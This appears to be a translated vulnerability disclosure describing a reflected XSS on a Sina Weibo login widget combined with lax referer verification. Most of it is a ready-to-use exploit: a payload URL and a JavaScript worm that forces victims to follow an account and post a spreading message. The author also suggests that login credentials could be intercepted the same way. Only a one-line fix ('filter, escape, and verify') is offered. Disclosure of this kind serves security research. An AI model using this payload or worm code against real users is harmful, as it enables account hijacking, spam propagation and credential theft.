A reflected XSS and lax referer verification on Sina Weibo (user login names and plaintext passwords can be intercepted, worms can be used, and followers can be refreshed)

Source: Internet
Author: User


I originally wanted to find a CSRF. I found an XSS, and then I found a referer check with lax verification. Combined, one click here gets me a follow.

First, the reflected XSS is here: http://service.weibo.com/widget/public/login.php?source=share&backurl=http://service.weibo.com/share/mobile.php?url=aaaaaaaa',a:(alert(1)// (the payload closes the JS string literal that `url` is written into). Add follow: POST. Warning! Congratulations! Then I wrote a code segment to test the effect.
    (function () {
        // Set referrer policy so only the origin is sent
        var meta = document.createElement('meta');
        meta.name = 'referrer';
        meta.content = 'origin';
        document.head.appendChild(meta);
        // document.head.appendChild(style);
        var iframe = document.createElement('iframe');
        iframe.name = 'myframework';
        document.head.appendChild(iframe);
        // Follow me
        var form = document.createElement('form'),
            input1 = document.createElement('input'),
            input2 = document.createElement('input');
        input1.name = 'wsrc';
        input1.value = 'app_follow_button';
        input2.name = 'uid';
        input2.value = '000000';
        form.appendChild(input1);
        form.appendChild(input2);
        form.action = 'http://widget.weibo.com/relationship/aj_attention.php';
        form.method = 'post';
        form.target = 'myframework';
        document.head.appendChild(form);
        form.submit();
        // Create xhr
        var xhr = false;
        try {
            xhr = new XMLHttpRequest();
        } catch (d) {
            try {
                xhr = new ActiveXObject('Msxml2.XMLHTTP');
            } catch (c) {
                try {
                    xhr = new ActiveXObject('Microsoft.XMLHTTP');
                } catch (b) {
                    xhr = false;
                }
            }
        }
        // Send message
        var data = 'content=New Year! Congratulations!';
        xhr.open('post', 'http://service.weibo.com/#/aj_assist.php?t=' + new Date().getTime(), false);
        xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded');
        xhr.send(data);
    })();
The user accesses the above XSS while logged in. I tried to use AJAX throughout, but the cross-domain authentication failed, so I changed to a form. Then, the share referer verification here is lax, so I use JS to set the referrer of the current page to origin and then remotely load the large JS section above through the reflected XSS. Then a link can be added to the message content so that it spreads. I did not try to hijack the user name and password, but it should be possible in theory, because it is a normal Weibo login page, and it is easy to intercept form data by inserting JavaScript.




Solution:
Filter, escape, and verify.
